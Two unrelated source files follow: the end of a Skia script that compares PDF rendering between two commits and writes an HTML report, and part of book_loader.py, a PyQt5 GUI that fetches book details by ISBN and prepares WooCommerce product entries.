dm_args = [dm, '--src'] + SOURCES + ['--config', PDF_CONFIG, '-w', data_dir]
if BAD_TESTS:
dm_args += ['-m'] + ['~^%s$' % x for x in BAD_TESTS]
check_call(dm_args, cwd=directory)
return dm
def rasterize(path):
ret = timeout(30, [PDFIUM_TEST, '--png', '--scale=%g' % (DPI / 72.0), path])
if ret != 0:
sys.stdout.write(
'\nTIMEOUT OR ERROR [%d] "%s"\n' % (ret, printable_path(path)))
return
assert os.path.isfile(path + '.0.png')
def main(control_commitish):
assert os.pardir == '..' and '/' in [os.sep, os.altsep]
assert test_exe(NINJA)
assert test_exe(PDFIUM_TEST)
os.chdir(os.path.dirname(__file__) + '/../..')
control_worktree = checkout_worktree(control_commitish)
tmpdir = tempfile.mkdtemp(prefix='skpdf_')
exp = tmpdir + '/experim'
con = tmpdir + '/control'
build_and_run_dm(os.curdir, exp)
dm = build_and_run_dm(control_worktree, con)
image_diff_metric = build_skia(control_worktree, 'image_diff_metric')
out = sys.stdout
common_paths = get_common_paths([con, exp], '.pdf')
out.write('\nNumber of PDFs: %d\n\n' % len(common_paths))
def compare_identical(path):
cpath, epath = (os.path.join(x, path) for x in (con, exp))
if is_same(cpath, epath):
remove(cpath, epath)
return True
return False
identical_count = shardsum(compare_identical, common_paths)
out.write('Number of identical PDFs: %d\n\n' % identical_count)
differing_paths = get_common_paths([con, exp], '.pdf')
if not differing_paths:
out.write('All PDFs are the same!\n')
sys.exit(0)
out.write('Number of differing PDFs: %d\n' % len(differing_paths))
for p in differing_paths:
out.write(' %s\n' % printable_path(tmpdir + '/*/' + p))
out.write('\n')
shard(rasterize,
[os.path.join(x, p) for p in differing_paths for x in [con, exp]])
common_pngs = get_common_paths([con, exp], '.pdf.0.png')
identical_count = shardsum(compare_identical, common_pngs)
out.write('Number of PDFs that rasterize the same: %d\n\n'
% identical_count)
differing_pngs = get_common_paths([con, exp], '.pdf.0.png')
if not differing_pngs:
out.write('All PDFs rasterize the same!\n')
sys.exit(0)
out.write('Number of PDFs that rasterize differently: %d\n'
% len(differing_pngs))
for p in differing_pngs:
out.write(' %s\n' % printable_path(tmpdir + '/*/' + p))
out.write('\n')
scores = dict()
def compare_differing_pngs(path):
cpath, epath = (os.path.join(x, path) for x in (con, exp))
s = float(subprocess.check_output([image_diff_metric, cpath, epath]))
indicator = '.' if s < 0.001 else ':' if s < 0.01 else '!'
sys.stdout.write(indicator)
sys.stdout.flush()
scores[path] = s
shard(compare_differing_pngs, differing_pngs)
paths = sorted(scores, key=lambda p: -scores[p])
out.write('\n\n')
for p in paths:
pdfpath = printable_path(tmpdir + '/*/' + p.replace('.0.png', ''))
out.write(' %6.4f %s\n' % (scores[p], pdfpath))
out.write('\n')
errors = []
rc = re.compile('^' + PDF_CONFIG + r'/([^/]*)/([^/]*)\.pdf\.0\.png$')
for p in paths:
m = rc.match(p)
assert(m)
source, name = m.groups()
errors.append((source, name, scores[p]))
for source in SOURCES:
os.makedirs(os.path.join(con, REFERENCE_BACKEND, source))
dm_args = [dm, '--src'] + SOURCES + [
'--config', REFERENCE_BACKEND, '-w', con, '-m'] + [
'^%s$' % name for _, name, _ in errors]
check_call(dm_args, cwd=control_worktree)
report = tmpdir + '/report.html'
with open(report, 'w') as o:
o.write(HTML_HEAD)
o.write('c="%s/";\n' % os.path.relpath(con, tmpdir))
o.write('e="%s/";\n' % os.path.relpath(exp, tmpdir))
o.write('z=[\n')
for source, name, score in errors:
gt = REFERENCE_BACKEND + '/' + source + '/' + name + '.png'
p = '%s/%s/%s.pdf.0.png' % (PDF_CONFIG, source, name)
desc = '%s | %s | %g' % (source, name, score)
o.write('["%s","%s","%s"],\n' % (p, gt, desc))
o.write(HTML_TAIL)
out.write(printable_path(report) + '\n')
sysopen(report)
if __name__ == '__main__':
if len(sys.argv) != 2:
USAGE = ('\nusage:\n {0} COMMIT_OR_BRANCH_TO_COMPARE_TO\n\n'
'e.g.:\n {0} HEAD\nor\n {0} HEAD~1\n\n')
sys.stderr.write(USAGE.format(sys.argv[0]))
sys.exit(1)
main(sys.argv[1])
|
book_loader.py
|
'''Gui''' # pylint: disable=(invalid-name)
import ast # Use to read list from config file.
import configparser # Read config file.
import csv
import io
import json
import logging # Logging errors.
import os
import pathlib
import re
import shutil
import sys
import time
import traceback
import webbrowser
from distutils import util
from queue import Queue # Report result from threads
from threading import Thread
from PIL import Image
from PyQt5 import QtCore, QtGui, QtWidgets
from book import find_html
from book import main as book_mode
from image_downloader import get_image
from private.gui_book_updater import Ui_MainWindow
from settings import Ui_Settings
from woo import get_product as woo_get
from woo import main as woo
current_dir = (os.path.dirname(os.path.realpath(__file__)))
logging_path = os.path.join(current_dir, "logs", "gui.log")
logging.basicConfig(filename=logging_path, level=logging.WARNING,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger=logging.getLogger(__name__)
class WorkerSignals(QtCore.QObject): # pylint: disable=(c-extension-no-member)
''' Worker signals '''
finished = QtCore.pyqtSignal() # pylint: disable=(c-extension-no-member)
error = QtCore.pyqtSignal(tuple) # pylint: disable=(c-extension-no-member)
result = QtCore.pyqtSignal(object) # pylint: disable=(c-extension-no-member)
progress = QtCore.pyqtSignal() # pylint: disable=(c-extension-no-member)
class Worker(QtCore.QRunnable): # pylint: disable=(c-extension-no-member)
''' Thread Worker '''
def __init__(self, fn, *args, **kwargs):
super(Worker, self).__init__()
# Store constructor arguments (re-used for processing)
self.fn = fn
self.args = args
self.kwargs = kwargs
self.signals = WorkerSignals()
# Add the callback to our kwargs
self.kwargs['progress_callback'] = self.signals.progress
@QtCore.pyqtSlot() # pylint: disable=(c-extension-no-member)
def run(self):
'''
Initialise the runner function with passed args, kwargs.
'''
# Retrieve args/kwargs here; and fire processing using them
try:
result = self.fn(*self.args, **self.kwargs)
except Exception as error: # pylint: disable=broad-except
logger.info(error)
traceback.print_exc()
exctype, value = sys.exc_info()[:2]
self.signals.error.emit((exctype, value, traceback.format_exc()))
else:
self.signals.result.emit(result) # Return the result of the processing
finally:
self.signals.finished.emit() # Done
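# A hedged usage sketch of the Worker/WorkerSignals pair (mirroring how
# update_item() wires a worker into the Qt thread pool further below). The
# target function and slot names here are placeholders; note that Worker
# injects a progress_callback keyword, so the target must accept it.
#
#   worker = Worker(long_running_fn, some_arg)
#   worker.signals.result.connect(handle_result)
#   worker.signals.finished.connect(handle_finished)
#   QtCore.QThreadPool.globalInstance().start(worker)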
class Completer(QtWidgets.QCompleter): # pylint: disable=(c-extension-no-member)
'''Category Completer'''
def __init__(self, *args, **kwargs):
super(Completer, self).__init__(*args, **kwargs)
self.setCaseSensitivity(QtCore.Qt.CaseInsensitive) # pylint: disable=(c-extension-no-member)
self.setCompletionMode(QtWidgets.QCompleter.PopupCompletion) # pylint: disable=(c-extension-no-member)
self.setWrapAround(False)
# Add texts instead of replace
def pathFromIndex(self, index):
'''Return the selected completion appended to the existing comma-separated entries.'''
path = QtWidgets.QCompleter.pathFromIndex(self, index) # pylint: disable=(c-extension-no-member)
lst = str(self.widget().text()).split(',')
if len(lst) > 1:
path = '%s, %s' % (','.join(lst[:-1]), path)
return path
def splitPath(self, path):
'''Complete only against the text after the last comma.'''
path = str(path.split(',')[-1]).lstrip(' ')
return [path]
class MyMainWindow(QtWidgets.QMainWindow, Ui_MainWindow): # pylint: disable=(c-extension-no-member)
''' Initialize Gui '''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.screen = app.primaryScreen()
print('Screen: %s' % self.screen.name())
self.size = self.screen.size()
print('Size: %d x %d' % (self.size.width(), self.size.height()))
self.rect = self.screen.availableGeometry()
print('Available: %d x %d' % ((self.rect.width()), (self.rect.height())))
self.setupUi(self)
# self.setMaximumSize(QtCore.QSize(self.rect.width(),self.rect.height()))
self.threadpool = QtCore.QThreadPool() # pylint: disable=(c-extension-no-member)
self.percent_size_line = 0.035
self.percent_size_label = 0.027
if self.rect.width() > 1700 and self.rect.height() > 900:
self.percent_size_line = 0.043
self.percent_size_label = 0.03
### RESIZING ###
self.cover_image_label.setMaximumSize(int(self.rect.width()*0.33) ,int(self.rect.height()*0.33)) # pylint: disable=(line-too-long)
self.isbn_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.name_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.title_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.author_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.publisher_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.category_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.year_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.amount_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.price_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.sale_price_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.description_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.binding_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.id_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.image_size_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.cover_label.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.next_desc_button.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.previous_desc_button.setMaximumHeight(int(self.rect.height()*self.percent_size_label))
self.name_line.setMaximumHeight(int(self.rect.height()*0.08))
self.isbn_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.title_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.author_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.publisher_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.category_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.year_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.amount_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.price_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.sale_price_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.check_button.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.binding_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.gift_check_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.release_check_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.sale_check_box.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.id_line.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.clear_button.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.load_button.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.source_label.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.description_text_edit.setMaximumHeight(int(self.rect.height()*0.6))
self.next_image_buttom.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.previous_image_buttom.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.image_change_button.setMaximumHeight(int(self.rect.height()*0.04))
self.save_to_file_button.setMaximumHeight(int(self.rect.height()*0.08))
self.settings_button.setMaximumHeight(int(self.rect.height()*0.08))
self.word_press_button.setMaximumHeight(int(self.rect.height()*0.12))
self.update_info_label.setMaximumHeight(int(self.rect.height()*self.percent_size_line))
self.config = configparser.ConfigParser()
self.config.read(os.path.join(os.path.dirname(__file__),'config', 'conf.ini'))
self.gui = {
'google' :util.strtobool(self.config.get('Source', 'google')),
'isbndb' :util.strtobool(self.config.get('Source', 'isbndb')),
'amazon' :util.strtobool(self.config.get('Source', 'amazon')),
'goodreads' :util.strtobool(self.config.get('Source', 'goodreads')),
'title_box' :True,
'authors_box' :True,
'description_box' :True,
'binding_box' :True,
'publisher_box' :True,
'publish_date_box' :True,
'categories_box' :True,
'image_box' :True
}
self.image_iterator = 0
self.image_list = []
self.current_dir = pathlib.Path(__file__).parent # Setting curret ABS path
self.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member, line-too-long)
self.setWindowTitle("Book Loader")
self.progress_bar = QtWidgets.QProgressBar() # pylint: disable=(c-extension-no-member)
self.statusbar.addWidget(self.progress_bar)
self.isbn_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{13}"))) # pylint: disable=(c-extension-no-member)
self.isbn_line.textChanged.connect(self.isbn_run)
self.year_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{4}"))) # pylint: disable=(c-extension-no-member)
self.amount_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{5}"))) # pylint: disable=(c-extension-no-member)
self.price_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{5}"))) # pylint: disable=(c-extension-no-member)
self.sale_price_line.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp("[0-9]{5}"))) # pylint: disable=(c-extension-no-member)
self._completer = Completer(self.categories_main_list())
self.category_line.setCompleter(self._completer)
self.image_change_button.clicked.connect(self.change_image)
self.check_button.clicked.connect(self.category_exist)
self.load_button.clicked.connect(self.update_item)
self.load_button.setDisabled(True)
self.clear_button.clicked.connect(self.clear_line_edit)
self.word_press_button.setDisabled(True)
self.word_press_button.clicked.connect(self.send_to_wordpress)
self.save_to_file_button.setDisabled(True)
self.save_to_file_button.clicked.connect(self.save_item)
self.settings_button.clicked.connect(self.open_settings)
self.actionConfig.triggered.connect(self.open_settings)
self.actionSave.triggered.connect(self.save_item)
self.actionExit_program.triggered.connect(self.close)
self.actionOpen_Config_folder.triggered.connect(lambda: os.startfile(self.current_dir))
self.actionGIt_Hub.triggered.connect(lambda: webbrowser.open('https://github.com/PytongMasters')) # pylint: disable=(line-too-long)
self.actionOpen_Help.triggered.connect(lambda: webbrowser.open('https://github.com/PytongMasters')) # pylint: disable=(line-too-long)
self.actionContact_Us.triggered.connect(lambda: webbrowser.open('https://github.com/PytongMasters')) # pylint: disable=(line-too-long)
self.msg_box = QtWidgets.QMessageBox() # pylint: disable=(c-extension-no-member)
self.msg_to_send = QtWidgets.QMessageBox() # pylint: disable=(c-extension-no-member)
self.options = QtWidgets.QFileDialog.Options() # pylint: disable=(c-extension-no-member)
self.screen_size = QtWidgets.QDesktopWidget().screenGeometry(-1) # pylint: disable=(c-extension-no-member)
self.word_press_button.setShortcut("Ctrl+Return")
self.setTabOrder(self.title_line,self.author_line)
self.setTabOrder(self.publisher_line,self.category_line)
self.setTabOrder(self.category_line,self.year_line)
self.setTabOrder(self.year_line,self.amount_line)
self.setTabOrder(self.amount_line,self.price_line)
self.setTabOrder(self.price_line,self.sale_price_line)
self.setTabOrder(self.sale_price_line,self.description_text_edit)
self.shortcut_full_screen = QtWidgets.QShortcut(QtGui.QKeySequence("F11"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_full_screen.activated.connect(self.full_screen)
self.shortcut_colon = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+;"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_colon.activated.connect(self.get_shortname_colon)
self.shortcut_comma = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+,"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_comma.activated.connect(self.get_shortname_comma)
self.shortcut_parenthesis = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+9"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_parenthesis.activated.connect(self.get_shortname_parenthesis)
self.shortcut_title_parenthesis = QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+9"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_title_parenthesis.activated.connect(self.get_short_title_parenthesis)
self.shortcut_gift = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+g"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_gift.activated.connect(lambda: self.gift_check_box.setChecked(False)
if self.gift_check_box.isChecked() else self.gift_check_box.setChecked(True)) # pylint: disable=(line-too-long)
self.shortcut_release = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+n"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_release.activated.connect(lambda: self.release_check_box.setChecked(False)
if self.release_check_box.isChecked() else self.release_check_box.setChecked(True)) # pylint: disable=(line-too-long)
self.shortcut_sale = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+s"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_sale.activated.connect(lambda: self.sale_check_box.setChecked(False)
if self.sale_check_box.isChecked() else self.sale_check_box.setChecked(True)) # pylint: disable=(line-too-long)
self.shortcut_next_image = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+right"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_next_image.activated.connect(self.next_image)
self.shortcut_previous_image = QtWidgets.QShortcut(QtGui.QKeySequence("Alt+left"), self) # pylint: disable=(c-extension-no-member)
self.shortcut_previous_image.activated.connect(self.previous_image)
self.next_image_buttom.clicked.connect(self.next_image)
self.previous_image_buttom.clicked.connect(self.previous_image)
self.desc_iterator = 0
self.next_desc_button.clicked.connect(self.next_description)
self.previous_desc_button.clicked.connect(self.previous_description)
self.next_desc_button.setDisabled(True)
self.previous_desc_button.setDisabled(True)
# self.load_button2.clicked.connect(self.search_in_book)
# def search_in_book(self):
# ''' Download afresh book details '''
# self.clear_line_edit()
def full_screen(self):
if self.isFullScreen():
self.showNormal()
else:
self.showFullScreen()
def next_description(self):
""" Next description from list """
try:
if len(self.dictionary['description']) > 1:
self.desc_iterator += 1
if len(self.dictionary['description']) == self.desc_iterator:
self.desc_iterator = 0
self.description_text_edit.setPlainText(self.dictionary['description'][self.desc_iterator]) # pylint: disable=(c-extension-no-member,line-too-long)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def previous_description(self):
""" Previous description from list """
try:
if len(self.dictionary['description']) > 1:
self.desc_iterator -= 1
if self.desc_iterator == -1:
self.desc_iterator = len(self.dictionary['description']) -1
self.description_text_edit.setPlainText(self.dictionary['description'][self.desc_iterator]) # pylint: disable=(c-extension-no-member,line-too-long)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_short_title_parenthesis(self):
''' Remove a parenthesized subtitle (the parentheses and their contents) '''
try:
parenthesis = re.compile("\((.*?)\)") # pylint: disable=(anomalous-backslash-in-string)
short = re.sub(parenthesis,'' ,self.title_line.text())
self.title_line.setText(short)
self.title_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:12pt;\">{}</span></b></p></body></html>'.format(self.title_line.text())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_shortname_colon(self):
''' Remove subtitle between colon and dash '''
try:
colon = re.compile(':(.*?)-')
short = re.sub(colon, " -", self.name_line.toPlainText())
self.name_line.setText(short)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_shortname_comma(self):
''' Remove subtitle between comma and dash '''
try:
comma = re.compile(',(.*?)-')
short = re.sub(comma, " -", self.name_line.toPlainText())
self.name_line.setText(short)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def get_shortname_parenthesis(self):
''' Remove subtitle between parenthesis and dash '''
try:
parenthesis = re.compile("\((.*?)-") # pylint: disable=(anomalous-backslash-in-string)
short = re.sub(parenthesis, "-", self.name_line.toPlainText())
self.name_line.setText(short)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def progress_fn(self):
''' Progress bar method'''
try:
self.progress_bar.setValue(0)
QtCore.QCoreApplication.processEvents() # pylint: disable=(c-extension-no-member)
self.msg_box.setWindowTitle('Pobieranie danych')
self.msg_box.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member),(line-too-long)
self.msg_box.setText('Pobieranie danych')
self.msg_box.show()
QtCore.QCoreApplication.processEvents() # pylint: disable=(c-extension-no-member)
for i in range(101):
if self.name_line.toPlainText() == '':
QtCore.QCoreApplication.processEvents() # pylint: disable=(c-extension-no-member)
time.sleep(0.05)
self.progress_bar.setValue(i)
else:
i = 100
self.progress_bar.setValue(i)
except Exception as error: # pylint: disable=broad-except
print("Progress fn: ",error)
logger.info(error)
def isbn_run(self):
''' Automatic run for ISBN edit line '''
try:
self.load_button.setDisabled(False)
if len(self.isbn_line.text()) == 13:
self.update_item()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def update_item(self):
''' Update button method '''
try:
self.update_info_label.clear()
self.item = self.isbn_line.text() # pylint: disable=(attribute-defined-outside-init)
worker = Worker(self.search_item)
worker.signals.finished.connect(self.get_source)
worker.signals.progress.connect(self.progress_fn)
self.threadpool.start(worker)
except Exception as error: # pylint: disable=broad-except
print("Update item: ",error)
logger.info(error)
def search_item(self, progress_callback):
''' Search item, Mutli ThreadPool '''
try:
progress_callback.emit()
que = Queue()
thread_woo = Thread(target=lambda q, arg1: q.put(self.search_item_woo(arg1)),args=(que,self.item)) # pylint: disable=(line-too-long)
thread_book = Thread(target=lambda q, arg1: q.put(self.search_item_book(arg1)),args=(que,self.item)) # pylint: disable=(line-too-long)
thread_woo.start()
thread_book.start()
result = que.get()
if result is None:
thread_woo.join()
thread_book.join()
else:
thread_woo.join()
except Exception as error: # pylint: disable=broad-except
print("Search item: ",error)
logger.info(error)
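    # Added note (not in the original source): search_item() races the WooCommerce and
    # book lookups on two worker threads and blocks on the shared Queue until the first
    # one finishes; if that first result is None it waits for both threads before
    # get_source() inspects self.dictionary_woo / self.dictionary_book. A generic,
    # hedged sketch of the same "first finished result" pattern, independent of this
    # GUI, would be:
    #
    #     from queue import Queue
    #     from threading import Thread
    #
    #     def first_result(*funcs):
    #         q = Queue()
    #         for f in funcs:
    #             Thread(target=lambda f=f: q.put(f()), daemon=True).start()
    #         return q.get()  # blocks until the fastest lookup returns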
def search_item_book(self, item): # pylint: disable=(unused-argument)
''' Search item in book '''
book_start = time.time()
try:
self.dictionary_book = book_mode(self.item, self.gui) # pylint: disable=(attribute-defined-outside-init)
except Exception as error: # pylint: disable=broad-except
print("Search item book: ",error)
logger.info(error)
self.dictionary_book = None # pylint: disable=(attribute-defined-outside-init)
print("book ",(time.time()) - book_start)
return self.dictionary_book
def search_item_woo(self, item): # pylint: disable=(unused-argument)
''' Search item in woocommerce '''
woo_start = time.time()
self.gui['name'] = True
try:
self.dictionary_woo = woo_get(self.item, self.gui) # pylint: disable=(attribute-defined-outside-init)
if not self.dictionary_woo :
self.dictionary_woo = None # pylint: disable=(attribute-defined-outside-init)
except Exception as error: # pylint: disable=broad-except
print("Search item woo: ",error)
logger.info(error)
self.dictionary_woo = None # pylint: disable=(attribute-defined-outside-init)
print("woo ",(time.time()) - woo_start)
return self.dictionary_woo
def get_source(self):
        ''' Compare the results from the book sources and WooCommerce '''
try:
            if self.dictionary_woo is None:
                self.dictionary = self.dictionary_book # pylint: disable=(attribute-defined-outside-init)
                if self.dictionary is None:
                    self.update_info_label.setText("Produkt nie znaleziony")
                    return
                self.dictionary['source'] = False
                self.next_desc_button.setDisabled(False)
                self.previous_desc_button.setDisabled(False)
            else:
                self.dictionary = self.dictionary_woo # pylint: disable=(attribute-defined-outside-init)
                self.dictionary['source'] = True
            self.put_dict()
except Exception as error: # pylint: disable=broad-except
print("Get source:",error)
logger.info(error)
def put_dict(self):
''' Put dictionary to editlines '''
try:
self.msg_box.close()
self.image_list = []
self.update_info_label.clear()
if self.dictionary['source'] is False:
self.get_image_list()
else:
self.image_list.append(self.dictionary_woo['image'])
self.image_iterator = 0
self.desc_iterator = 0
except Exception as error: # pylint: disable=broad-except
print("Put Dict 1:",error)
logger.info(error)
try:
self.dictionary["image"] = get_image(self.image_list[0], self.item)
except Exception as error: # pylint: disable=broad-except
print(error)
print("Put Dict image list :",error)
self.dictionary["image"] = None
# Convert binding to Polish names
try:
if ((self.dictionary['binding']).lower() == 'hardcover') or ((self.dictionary['binding']).lower() == 'twarda'): # pylint: disable=(line-too-long)
self.dictionary['binding'] = 'twarda'
elif ((self.dictionary['binding']).lower() == 'paperback') or ((self.dictionary['binding']).lower() == 'miękka'): # pylint: disable=(line-too-long)
self.dictionary['binding'] = 'miękka'
else:
self.dictionary['binding'] = 'inna'
except Exception as error: # pylint: disable=broad-except
print("Put Dict cover check: ",error)
logger.info(error)
self.dictionary['binding'] = 'inna'
# Set dictionary to edit lines
try:
self.isbn_line.setText(self.item)
if self.dictionary['source'] is False:
self.name_line.setText(str(self.dictionary['title']) + ' - ' + str(self.dictionary['authors'])) # pylint: disable=(line-too-long)
else:
self.name_line.setText(str(self.dictionary['name']))
if self.dictionary['description']:
desc_with_html = [has_html for has_html in self.dictionary['description'] if find_html(has_html)] # pylint: disable=(line-too-long)
if desc_with_html:
if type(desc_with_html) is list:
self.description_text_edit.setPlainText(str(max(desc_with_html, key=len)))
else:
self.description_text_edit.setPlainText(str(desc_with_html))
elif type(self.dictionary['description']) is list:
self.description_text_edit.setPlainText(str(max(self.dictionary['description'], key=len))) # pylint: disable=(line-too-long)
else:
self.description_text_edit.setPlainText(str(self.dictionary['description']))
if self.dictionary['title']:
self.title_line.setText(self.dictionary['title'])
if self.dictionary['authors']:
self.author_line.setText(self.dictionary['authors'])
if self.dictionary['binding']:
self.binding_box.setCurrentIndex(self.binding_box.findText(self.dictionary['binding']))
if self.dictionary['publisher']:
self.publisher_line.setText(self.dictionary['publisher'])
if self.dictionary['categories']:
self.category_line.setText(",".join(list(self.dictionary['categories'])))
if self.dictionary['publish_date']:
self.year_line.setText(self.dictionary['publish_date'])
except Exception as error: # pylint: disable=broad-except
print("Put Dict to edit lines : ",error)
logger.info(error)
# Show image
try:
if self.dictionary['image']:
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
except Exception as error: # pylint: disable=broad-except
print("Put Dict - show image: ",error)
logger.info(error)
# Show source and specific edit lines
try:
if self.dictionary['source'] is False:
self.source_label.setText("Stwórz nowy produkt")
self.amount_line.setText('1')
else:
self.source_label.setText("Zaktualizuj istniejący produkt")
self.id_line.setText(str(self.dictionary['id']))
if self.dictionary['tags']:
if 'Sale' in self.dictionary['tags']:
self.sale_check_box.setChecked(True)
if 'New Release' in self.dictionary['tags']:
self.release_check_box.setChecked(True)
                    if 'Perfect Gift' in self.dictionary['tags']:
                        self.gift_check_box.setChecked(True)
try:
self.sale_price_line.setText(str(self.dictionary['sale_price']))
self.amount_line.setText(str(self.dictionary['amount']))
self.price_line.setText(str(self.dictionary['price']))
except Exception as error: # pylint: disable=broad-except
print("Put Dict - show price/amount: ",error)
logger.info(error)
except Exception as error: # pylint: disable=broad-except
print("Put Dict - source and other: ",error)
logger.info(error)
# Disable / Undisable buttons
try:
self.save_to_file_button.setDisabled(False)
self.word_press_button.setDisabled(False)
self.load_button.setDisabled(True)
self.name_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.name_line.toPlainText())) # pylint: disable=(line-too-long)
self.title_line.setToolTip('<html><head/><body><p><b><span style=\" font-size:16pt;\">{}</span></b></p></body></html>'.format(self.title_line.text())) # pylint: disable=(line-too-long)
self.amount_line.setFocus()
except Exception as error: # pylint: disable=broad-except
print("Put Dict 3:",error)
logger.info(error)
def get_dictionary(self):
''' Getting dictionary from edit lines '''
tags = []
if self.sale_check_box.isChecked():
tags.append('Sale')
if self.release_check_box.isChecked():
tags.append('New Release')
if self.gift_check_box.isChecked():
tags.append('Perfect Gift')
try:
self.dictionary_to_save = { # pylint: disable=(attribute-defined-outside-init)
'isbn' : self.isbn_line.text(),
'name' : self.name_line.toPlainText(),
'title' : self.title_line.text(),
'authors' : self.author_line.text(),
'description' : self.description_text_edit.toPlainText(),
'binding' : self.binding_box.currentText(),
'publisher' : self.publisher_line.text(),
'publish_date' : self.year_line.text(),
'image': self.dictionary['image'],
'categories' : self.category_to_save,
'price' : self.price_line.text(),
'amount' : self.amount_line.text(),
'source' : self.dictionary['source'],
'tags' : tags
}
if self.dictionary["source"]:
self.dictionary_to_save['id'] = self.dictionary["id"]
if self.sale_price_line.text():
self.dictionary_to_save['sale_price'] = self.sale_price_line.text()
except Exception as error: # pylint: disable=broad-except
print("Get dictionary method:\n",error)
logger.info(error)
return self.dictionary_to_save
def send_to_wordpress(self):
''' Method to send product / Check line edit if not empty '''
try:
self.category_exist()
self.woocommerce_dict = self.get_dictionary() # pylint: disable=(attribute-defined-outside-init)
if (self.price_line.text() == '') or (self.amount_line.text() == '')or (self.description_text_edit.toPlainText() == '') or (self.name_line.toPlainText() == '') or (self.title_line.text() == '') or (self.author_line.text() == '') or (self.publisher_line.text() == '') or (self.year_line.text() == '') or (self.category_line.text() == ''): # pylint: disable=(line-too-long)
self.msg_to_send.setWindowTitle('Uwaga!')
self.msg_to_send.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member),(line-too-long)
self.msg_to_send.setIcon(QtWidgets.QMessageBox.Warning) # pylint: disable=(c-extension-no-member)
self.msg_to_send.setText('Podaj resztę danych')
self.msg_to_send.show()
else:
